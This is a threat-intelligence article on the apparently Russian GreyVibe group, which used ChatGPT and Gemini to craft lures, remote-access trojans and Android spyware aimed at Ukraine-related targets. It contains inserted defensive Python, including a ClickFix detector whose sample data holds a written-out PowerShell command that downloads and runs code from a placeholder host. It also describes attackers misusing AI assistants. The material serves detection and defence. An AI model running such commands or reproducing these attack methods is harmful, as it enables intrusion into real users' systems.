GreyVibe hackers use ChatGPT, Gemini to power cyberattacks
Researchers from WithSecure link the GreyVibe group, a likely Russian threat actor, to a cyber-espionage campaign that uses AI-generated lures and custom malware to target Ukraine-related and other sectors since August 2025. While the operation shows state-aligned traits, experts caution it may lack the discipline of mature nation-state actors, suggesting possible hybrid ties with cybercriminals. GreyVibe reportedly used multiple attack chains—PhantomMail, PhantomClick, PrincessClub, DroneLink, and Nebo—and employed AI tools like ChatGPT and Google Gemini to craft convincing content and bespoke obfuscators (LOOKVALPS, LOOKVALJS, DAYLIGHT, TEASOUP). Additional tools include the LegionRelay and PhantomRelay PowerShell RATs and the FallSpy Android spyware, with cryptocurrency mining observed in some samples. WithSecure provides IoCs to help defenders detect and block this activity.

GreyVibe: AI-Augmented Cyber Espionage Campaigns
Overview
A Russian-speaking threat group observed under the moniker GreyVibe has been leveraging artificial intelligence to design convincing lures and to power a suite of custom malware tools. The operation appears to have been active since at least August 2025 and shows a clear focus on Ukrainian or Ukraine-related organizations across military, government, civilian, and business sectors. While researchers note that the activity aligns with Russian state interests, there is no definitive classification of GreyVibe as a formal nation-state operation. The campaign was uncovered by WithSecure, which highlights a sophisticated use of AI-generated content to support social engineering and operational tooling.
Threat Landscape and Attribution
GreyVibe is characterized by a blend of state-aligned objectives and possible cybercriminal elements. Key indicators include:
- Language cues in malware panels and code comments consistent with Russian-speaking actors.
- C2 timing configured to Moscow time (UTC+3), reinforcing the link to Russian-speaking operators.
- Observed use of both cyber-espionage tooling and previously used cybercriminal infrastructure, suggesting a hybrid or evolving lineage.
- Suspected ties to former cybercriminal communities through development artifacts such as ISO builders associated with TrickBot remnants.
- Public sharing of development and test samples on scanning platforms, which is atypical for strictly nation-state operations.
Attack Chains: How GreyVibe Adapts and Delivers
The campaign employs multiple interlocking attack chains designed to mislead targets and compromise endpoints. Notable chains include:
PhantomMail
- Spear-phishing emails delivering malicious ZIP or RAR archives.
- Delivery channels include Google Drive and 4sync links.
- Lures present decoy PDFs or fake error messages to entice recipients into opening the payload.
- Targeted impersonations span Ukrainian government, emergency services, telecoms, and energy sectors.
PhantomClick
- Fake CAPTCHA or ClickFix pages designed to resemble legitimate verification prompts.
- Disguised sites mimic Zoom and LAPAS portals.
- Victims are coaxed into executing self-infecting commands via faux Cloudflare verification prompts.
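The PhantomClick chain relies on the victim executing a pasted command after a fake verification page. The detection sketch below is an added example, not WithSecure's code and not part of the GreyVibe report; it assumes the usual ClickFix flow (the command is pasted into the Win+R dialog, so the script host is spawned by explorer.exe, with a hidden window, an execution-policy bypass and a download-and-execute stage) and runs over constructed process-creation events, not real telemetry.

```python
"""Detection sketch for ClickFix-style 'paste this command' infections.

Added example, not WithSecure's code or part of the GreyVibe report. It assumes
the common ClickFix flow: the victim pastes a command into the Win+R dialog, so
the script host's parent is explorer.exe, and the pasted command usually hides
its window, bypasses execution policy and pulls a second stage from the web.
"""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}   # Win+R and the Start menu spawn from here

# (reason, regex) pairs; every hit adds a reason to the verdict.
SUSPICIOUS = [
    ("hidden-window",        re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("policy-bypass",        re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)),
    ("no-profile",           re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("encoded-command",      re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download-and-execute", re.compile(
        r"(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl)\b"
        r".*(?:\|\s*iex\b|invoke-expression)", re.I)),
]


@dataclass
class ProcEvent:
    """One process-creation record as an EDR or Sysmon event would carry it."""
    parent_image: str
    image: str
    command_line: str


def assess(event):
    """Return the reasons an event looks like ClickFix, or [] if it looks clean."""
    if event.image.lower() not in SCRIPT_HOSTS:
        return []
    reasons = [name for name, rx in SUSPICIOUS if rx.search(event.command_line)]
    if not reasons:
        return []
    if event.parent_image.lower() in INTERACTIVE_PARENTS:
        # Spawned straight from the desktop shell: a human pasted it, not a script
        reasons.insert(0, "interactive-parent")
    return reasons


def flag_clickfix(events, min_reasons=2):
    """Keep only events with at least min_reasons hits (tunes out lone bypass flags)."""
    flagged = []
    for event in events:
        reasons = assess(event)
        if len(reasons) >= min_reasons:
            flagged.append((event, reasons))
    return flagged


# Constructed sample events; hostnames are placeholders, not report IoCs.
SAMPLE_EVENTS = [
    # Pasted into Win+R after a fake "verify you are human" page
    ProcEvent("explorer.exe", "powershell.exe",
              'powershell -w hidden -nop -ep bypass -c "irm https://verify.example.invalid/x|iex"'),
    # Ordinary admin use from a terminal: hides nothing, downloads nothing
    ProcEvent("cmd.exe", "powershell.exe", "powershell Get-ChildItem C:\\Logs"),
    # Not a script host at all
    ProcEvent("explorer.exe", "notepad.exe", "notepad C:\\Users\\u\\notes.txt"),
    # Scheduled maintenance: bypass flag alone, trusted parent, no download stage
    ProcEvent("svchost.exe", "powershell.exe",
              "powershell -ep bypass -File C:\\Scripts\\backup.ps1"),
]

if __name__ == "__main__":
    for event, reasons in flag_clickfix(SAMPLE_EVENTS):
        print(f"{event.parent_image} -> {event.image}: {', '.join(reasons)}")
```

On a real host the pasted text also survives in the user's RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which is a useful corroborating artifact when the process event alone is ambiguous; the min_reasons threshold is there so that legitimate scripts run with a bare execution-policy bypass do not page an analyst.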
PrincessClub
- Fake Ukrainian adult and dating sites used as initial access points.
- Distribution of FallSpy Android spyware and Windows payloads (PhantomRelay/LegionRelay).
- Operators exploited fake female Telegram personas to establish trust and may have added WebRTC-based live calls to capture audio and video.
- Involves cross-platform operation, with Android and Windows components in tandem.
DroneLink
- Fake Ukrainian military charity sites themed around FPV (first-person view) drones and UAVs.
- Shared infrastructure and tooling with PrincessClub campaigns to streamline execution.
Nebo
- Fake “СПО НЕБО” Russian military login pages crafted to trick Ukrainian military personnel.
- Aimed at convincing victims they were accessing a legitimate Russian military terminal.
AI Tools and Content Production
GreyVibe distinguishes itself by using advanced AI to craft highly realistic content and to generate operational payloads. The tools cited include:
- ChatGPT, Ideogram AI, and Google Gemini used to generate detailed lure content and assist with tool development.
- Custom obfuscators such as LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP, likely built with AI-assisted guidance to evade detection and complicate analysis.
- AI-assisted development of a PowerShell-based remote access trojan named LegionRelay, enabling a broad range of data exfiltration and control functions.
LegionRelay and PhantomRelay: Malware Roles
LegionRelay
- A PowerShell-based remote access Trojan (RAT) with multi-faceted capabilities.
- Functions include file theft, screenshots, browser credential theft, exfiltration of Telegram and WhatsApp data, and the setup of RDP access.
- Demonstrates integration with AI-assisted tooling for development and perhaps obfuscation.
PhantomRelay
- Another PowerShell-based RAT with advanced features.
- Supports system fingerprinting, dynamic script loading, and execution of PowerShell and Windows commands.
- Used to extend control over infected hosts and facilitate further exploitation.
FallSpy Android Spyware
- Deployed in PrincessClub and Nebo campaigns.
- Purely focused on intelligence gathering: contacts, call logs, device and network information, location data, media, and SIM data.
- Reflects a broader trend of targeting mobile devices to complement Windows infections.
Campaign Artifacts and Visual Cues
The operation includes visual indicators such as LLM markers embedded in images used by GreyVibe. These markers accompany malware artifacts and are part of the broader toolkit that leverages AI-generated content for deception and branding. The campaign’s images, code comments, and UI motifs reinforce the perception of legitimacy around the fake services and portals.
Evidence of Hybridization and Operational Nuances
WithSecure notes that GreyVibe’s activity resembles a nation-state operation in some respects but falls short of the hallmark sophistication and discipline observed in mature state-backed campaigns. The presence of cybercriminal traits—such as early test samples, public artifact uploads, and a cryptocurrency miner deployed on some victims—suggests a hybrid model where state-aligned objectives coexist with criminal methods and personnel. The ISO-building artifact associated with UAC-0098 and the use of mixed infrastructure point to a possible absorption of former cybercriminals into a state-directed tasking framework, or at least a collaboration across disparate groups.
Organizational Footprint and Targeted Sectors
The targeted ecosystem encompasses military, government, civilian, and business sectors relevant to national security and strategic infrastructure. The Ukrainian context is prominent, with multiple campaign components explicitly referencing Ukrainian institutions and narratives. The breadth of tools and lures indicates a coordinated effort to maximize reach while maintaining plausible deniability through multilingual content and varied delivery mechanisms.
Indicators of Compromise: What Researchers Observe
- AI-generated lure content and realistic decoys designed to bypass suspicion.
- A mix of Windows and Android payloads deployed via social engineering channels.
- Lures and payloads aligned with Ukrainian-related themes and geopolitical narratives.
- Malware panels, comments, and C2 configurations in languages consistent with Russian-speaking actors.
- C2 timing aligned to Moscow time (UTC+3).
- Presence of legacy tools and artifacts linked to known groups or incidents (e.g., TrickBot-associated components).
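Both the attribution section and the indicator list above cite C2 timing aligned to Moscow time (UTC+3). The report describes that as a configured setting; the complementary check a defender can run on their own telemetry is to ask which UTC offset best folds observed operator-driven C2 activity into a normal working day. The block below is an added example, not WithSecure's code, and the timestamps it analyses are constructed.

```python
"""Infer an operator's working-hours UTC offset from C2 activity timestamps.

Added example, not from WithSecure's report. The report states the C2 timing was
configured to Moscow time (UTC+3); this shows the complementary analytic of
scoring candidate UTC offsets by how much operator activity they place inside a
09:00-18:00 local working window. All timestamps below are constructed.
"""
from collections import Counter
from datetime import datetime, timedelta

# Constructed C2 activity (interactive tasking, not automated beacon jitter),
# stored as ISO-8601 UTC strings the way a proxy or EDR export would carry them.
C2_ACTIVITY_UTC = [
    "2025-09-01T06:12:00+00:00", "2025-09-01T07:40:00+00:00", "2025-09-01T09:05:00+00:00",
    "2025-09-01T11:30:00+00:00", "2025-09-01T14:55:00+00:00",
    "2025-09-02T06:03:00+00:00", "2025-09-02T08:20:00+00:00", "2025-09-02T10:10:00+00:00",
    "2025-09-02T13:45:00+00:00", "2025-09-02T14:30:00+00:00",
    "2025-09-03T06:50:00+00:00", "2025-09-03T12:15:00+00:00", "2025-09-03T14:05:00+00:00",
    "2025-09-03T22:10:00+00:00",   # outlier: one late-night session
]

WORK_START, WORK_END = 9, 18   # local working window, end exclusive


def hour_histogram(timestamps, offset_hours):
    """Count activity per local hour after shifting UTC by offset_hours."""
    shift = timedelta(hours=offset_hours)
    hist = Counter()
    for ts in timestamps:
        local = datetime.fromisoformat(ts) + shift
        hist[local.hour] += 1
    return hist


def working_hours_fraction(timestamps, offset_hours):
    """Fraction of events that land inside the working window at this offset."""
    hist = hour_histogram(timestamps, offset_hours)
    in_window = sum(n for h, n in hist.items() if WORK_START <= h < WORK_END)
    return in_window / max(1, sum(hist.values()))


def rank_offsets(timestamps, candidates=range(-12, 15)):
    """Return (offset, fraction) pairs, best first; ties keep candidate order."""
    scored = [(off, working_hours_fraction(timestamps, off)) for off in candidates]
    return sorted(scored, key=lambda pair: -pair[1])


def infer_offset(timestamps):
    """The single best-fitting UTC offset; check rank_offsets() for close runners-up."""
    return rank_offsets(timestamps)[0][0]


if __name__ == "__main__":
    for offset, frac in rank_offsets(C2_ACTIVITY_UTC)[:5]:
        print(f"UTC{offset:+d}: {frac:.0%} of activity inside working hours")
```

Treat the result as corroboration rather than attribution: UTC+3 covers Moscow but also Minsk, Istanbul and Riyadh, automated check-ins must be separated from hands-on-keyboard sessions before scoring, and a small sample with a flat histogram will produce ties between neighbouring offsets.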
Conclusion: A Complex, Evolving Threat Landscape
GreyVibe presents a multi-faceted threat that blends AI-assisted social engineering, custom malware tooling, and hybrid criminal-state characteristics. The campaign demonstrates a sophisticated approach to deception, with AI used not only to automate content generation but also to support tool development and obfuscation. While attribution to a formal nation-state operation remains a matter of interpretation, the activity clearly targets Ukrainian-related entities and reflects a strategic intent consistent with broader geopolitical tensions in the region. The roster of campaigns—PhantomMail, PhantomClick, PrincessClub, DroneLink, and Nebo—highlights the depth of planning and the willingness to employ diverse delivery channels, from fake portals to Android spyware, to achieve reconnaissance and data exfiltration objectives.


